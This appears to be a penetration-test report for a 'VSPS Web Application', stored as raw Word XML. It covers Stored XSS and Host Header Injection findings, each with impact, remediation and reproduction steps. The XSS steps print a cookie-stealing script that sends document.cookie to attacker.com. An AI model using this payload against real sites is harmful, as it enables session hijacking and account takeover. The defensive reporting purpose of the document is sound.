          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>/script&gt;. A more complex payload designed for data exfiltration might involve fetching user cookies or redirecting the user. 3. Submit the form or save the changes. The malicious script is now stored in the application's database. 4. Log in as a different user or access the same page from a different browser/session where the stored data is displayed. For instance, navigate to the page where the submitted feedback or comment is rendered for other users. 5. Observe that the JavaScript payload executes in the victim's browser. If the payload was &lt;script&gt;alert('XSS</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>');&lt;</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>/script&gt;, an alert box with the text 'XSS' will appear, confirming the vulnerability. If a data exfiltration payload was used, observe network traffic for signs of data being sent to an attacker-controlled domain.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52B9B5C4" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pBdr>
          <w:left w:val="single" w:sz="24" w:space="4" w:color="0369A1"/>
        </w:pBdr>
        <w:spacing w:before="200" w:after="100"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0369A1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>References</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="397EFBD7" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="30"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="64748B"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>• https://owasp.org/www-community/attacks/xss/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57904690" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="30"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="64748B"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>• https://cwe.mitre.org/data/definitions/79.html</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54EFEBE3" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="30"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="64748B"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>• https://portswigger.net/web-security/xss/stored</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13393AAF" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="30"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="64748B"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>• https://cheatsheetseries.owasp.org/cheatsheets/Cross_Site_Scripting_Prevention_Cheat_Sheet.html</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="158D0F89" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F99CAF1"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4567D87D"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2A0B6707" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="26"/>
                <w:szCs w:val="26"/>
              </w:rPr>
              <w:t>Stored Cross-Site Scripting (XSS)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127C4B77" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
              </w:rPr>
              <w:t>HIGH CVSS 8.0</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="3BE91F75"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7469BB8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968A27E"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E2EB78E" w14:textId="220B63B8"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023</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1449F20"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0994E9D" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="DC2626"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>8.0 (High)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="009B7CCA" w14:paraId="7A8AF69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74BB908"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F0627F8" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>A03:2021-Injection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A383A8C"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A2AE474" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>CWE-79</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="009B7CCA" w14:paraId="2B51CB5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0226DB2"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3D72F18"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1364EA2"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B738F6B" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Open</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="009B7CCA" w14:paraId="6FEACF4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BF3CAA2"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2B1A1DC"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39B5C41"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A2EC93B" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="D97706"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Pending</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="009B7CCA" w14:paraId="006E8E2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E1F81FC"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9CA5F43"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3B56874"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174FF30" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Possible</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="2C4F82F3" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pBdr>
          <w:left w:val="single" w:sz="24" w:space="4" w:color="4F46E5"/>
        </w:pBdr>
        <w:spacing w:before="300" w:after="100"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="4F46E5"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Description</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="015F6607" w14:textId="52A01649" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Stored Cross-Site Scripting (XSS) occurs when an application stores untrusted data without proper validation or sanitization and later includes that data in a web page without proper output encoding. The root cause is the failure to neutralize or encode user-supplied input before it is persistently stored (e.g., in a database) and subsequently retrieved and displayed to other users. \n\</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>nExploitation</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> works by an attacker injecting malicious script (typically JavaScript) into a vulnerable input field, such as a comment section, user profile, or message board. This script is then saved in the </w:t>
      </w:r>
      <w:r w:rsidR="00877518">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">VSPS </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Web Application's Oracle database. When another legitimate user accesses the web page that retrieves and displays this stored malicious data, their web browser executes the attacker's script. This execution occurs within the context of the victim's browser session, allowing the attacker to bypass the Same-Origin Policy. \n\</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>nThe</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> attack surface typically includes any input forms that store user data, such as public comments, user profiles, or administrative content management sections. The affected components include the input processing logic, the Oracle database where the malicious payload is stored, and the JSP pages or Struts actions responsible for rendering and displaying the stored data.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43D9D925" w14:textId="1184E2E6" w:rsidR="009B7CCA" w:rsidRDefault="00877518">
      <w:pPr>
        <w:pBdr>
          <w:left w:val="single" w:sz="24" w:space="4" w:color="D97706"/>
        </w:pBdr>
        <w:spacing w:before="200" w:after="100"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="D97706"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Impact</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="176C444A" w14:textId="77CC3F02" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FEF3C7"/>
        <w:spacing w:after="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">A successful Stored Cross-Site Scripting attack on the </w:t>
      </w:r>
      <w:r w:rsidR="00877518">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">VSPS </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Web Application poses significant risks to the organization, extending beyond immediate technical concerns. Financially, it can lead to substantial costs associated with incident response, forensic investigations, remediation efforts, and potential legal fees from affected individuals or entities. Reputational damage is also a major concern, as a public data breach or compromise of user accounts can erode customer trust, lead to user attrition, and harm the organization's standing, impacting future partnerships or government contracts. \n\</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>nFrom</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> a regulatory standpoint, failure to protect against such vulnerabilities can result in non-compliance with frameworks like NIST CSF, which mandates robust security controls. Depending on the type of data exposed, there could be violations of data privacy regulations such as GDPR or HIPAA, potentially leading to hefty fines (e.g., up to 4% of annual global revenue for GDPR). \n\</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>nAttackers</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> can leverage Stored XSS to steal sensitive user information, including session cookies, which can lead to complete account takeover. This compromises data confidentiality and integrity, as attackers can impersonate legitimate users, access confidential information, or tamper with data within the application. The collective impact threatens the organization's financial stability, compliance posture, and overall trustworthiness.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F847811" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pBdr>
          <w:left w:val="single" w:sz="24" w:space="4" w:color="16A34A"/>
        </w:pBdr>
        <w:spacing w:before="200" w:after="100"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="16A34A"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Remediation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07FEEBF6" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="50"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>STRATEGIC FIX (Architecture</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>):\</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">n- Implement a robust, centralized input validation and output encoding framework across the entire application architecture. This framework should enforce strict data types, length limits, and whitelisting for all user-supplied input before it is stored in the database.\n- Adopt modern web application frameworks or libraries that inherently provide strong security features, including automatic output encoding and secure templating engines, or ensure Struts 1 is appropriately configured with custom security </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>measures.\n- Implement a comprehensive Content Security Policy (CSP) header to mitigate the impact of any residual XSS vulnerabilities by restricting the sources of content (scripts, styles, images) that a browser is allowed to load and execute.\n- Conduct regular, automated static application security testing (SAST) and dynamic application security testing (DAST) throughout the development lifecycle to proactively identify and address XSS and similar injection vulnerabilities.\n\</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>nTactical</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> FIX (Code Implementation):\n- All user-supplied data that is stored and subsequently rendered on a web page must undergo rigorous context-specific output encoding. For HTML contexts, use HTML entity encoding; for JavaScript contexts, use JavaScript encoding; for URL contexts, use URL encoding. Do not rely solely on input validation as a defense against XSS; always perform output encoding.\n- For Struts 1 applications, ensure that custom JSP tags or Expression Language (EL) expressions used to render user-generated content properly encode the output. Avoid direct insertion of user input into HTML without explicit encoding. Consider using libraries that provide secure encoding functions (e.g., OWASP ESAPI Encoder or Apache Commons Text's </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>StringEscapeUtils</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">, ensuring the version used is secure and </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>up-to-date</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>).\n- Validate all user input on the server-side to ensure it conforms to expected formats and does not contain malicious characters. This includes length checks, type checks, and whitelisting of allowed characters or patterns for specific fields.\n- Implement `</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>HttpOnly</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>` and `Secure` flags for all session cookies to prevent client-side scripts from accessing them and to ensure they are only sent over encrypted connections.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59AEF04B" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pBdr>
          <w:left w:val="single" w:sz="24" w:space="4" w:color="64748B"/>
        </w:pBdr>
        <w:spacing w:before="200" w:after="100"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="64748B"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Steps to Reproduce</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2745425E" w14:textId="43476DF8" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">1. Log in to the </w:t>
      </w:r>
      <w:r w:rsidR="00877518">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">VSPS </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Web Application with a low-privileged user </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>account, or</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> access any publicly accessible form that allows content submission (e.g., a comment section or user profile update). \n2. Navigate to an input field that accepts and stores user-generated content, such as a comment box, a user profile 'About Me' section, or a forum post editor. \n3. Enter a malicious payload, such as `&lt;script&gt;alert('XSS</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>');&lt;</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>/script&gt;` or more advanced payloads like `&lt;script&gt;</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>document.location</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">='http://attacker.com/log?c='+document.cookie;&lt;/script&gt;`, into the vulnerable input field. \n4. Submit the form or save the changes. The malicious payload is now stored in the application's database.\n5. Log out of the attacker account (if applicable) or switch to a different user </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>account, or</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> simply navigate to the page where the stored content is displayed. \n6. When the affected page is loaded in the victim's browser, the embedded malicious script will execute. For the `alert('XSS</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>')`</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> payload, a pop-up window will appear, indicating a successful XSS attack. For the cookie-stealing payload, the victim's session cookie would be sent to the attacker's server.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="270FD0D0" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pBdr>
          <w:left w:val="single" w:sz="24" w:space="4" w:color="0369A1"/>
        </w:pBdr>
        <w:spacing w:before="200" w:after="100"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0369A1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>References</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24CA8C0A" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="30"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="64748B"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>• https://cheatsheetseries.owasp.org/cheatsheets/Cross_Site_Scripting_Prevention_Cheat_Sheet.html</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="096B1242" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="30"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="64748B"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>• https://www.veracode.com/security/xss</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BA83169" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E7C7544"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64A6E609"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77AB8FBC" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="26"/>
                <w:szCs w:val="26"/>
              </w:rPr>
              <w:t>Host Header Injection</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0BB61DEE" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
              </w:rPr>
              <w:t>HIGH CVSS 8.8</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="71D3D869"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14C5E41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722189F"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177BEE" w14:textId="774DD49B"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022</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9FA3013"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E134835" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="DC2626"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>8.8 (High)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="009B7CCA" w14:paraId="398F5CF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6CCCB42"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99E6895"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1F1284"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C162B7E" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>CWE-20</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="009B7CCA" w14:paraId="25B63E7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BED26B3"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3F26DC1"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6695EF3"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36C884F" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Open</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="009B7CCA" w14:paraId="59831AF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B86B670"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A11DFC5"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AC276C8"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153DE48" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="D97706"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Pending</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="009B7CCA" w14:paraId="15B498D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5AD5E87"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71025C1"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185263F"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18FD26" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Possible</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="009B7CCA" w14:paraId="2D2A6FE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C581CB0" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>CVE References</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4250" w:type="pct"/>
            <w:gridSpan w:val="3"/>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tcPr>
          <w:p w14:paraId="6B5168B2" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="DC2626"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>https://nvd.nist.gov/vuln/detail/CVE-2007-0091, https://nvd.nist.gov/vuln/detail/CVE-2006-5757</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="501482EE" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pBdr>
          <w:left w:val="single" w:sz="24" w:space="4" w:color="4F46E5"/>
        </w:pBdr>
        <w:spacing w:before="300" w:after="100"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="4F46E5"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Description</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DEFC844" w14:textId="4A7DCCF2" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Host Header Injection occurs when a web application trusts the Host </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>header</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> provided by the client without proper validation. The HTTP Host header specifies the domain name of the server (and optionally the port number) that the client is trying to reach. When an application generates absolute URLs (e.g., for password reset links, email verification links, or redirects) based on the value of the Host header, an attacker can manipulate this header to point to a domain they control. This manipulation can trick the application into generating links that direct users to malicious sites, or for server-side operations, can mislead internal components.  The root cause is the application's failure to validate or sanitize the Host header against a whitelist of legitimate domains. Instead, it directly incorporates the user-supplied header into critical application logic or output. Exploitation works by an attacker intercepting an HTTP request, modifying the Host header to a malicious domain (e.g., phishing.example.com), and then observing if the application reflects this malicious domain in generated URLs or server-side logic.  Affected components typically include any part of the </w:t>
      </w:r>
      <w:r w:rsidR="00877518">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">VSPS </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
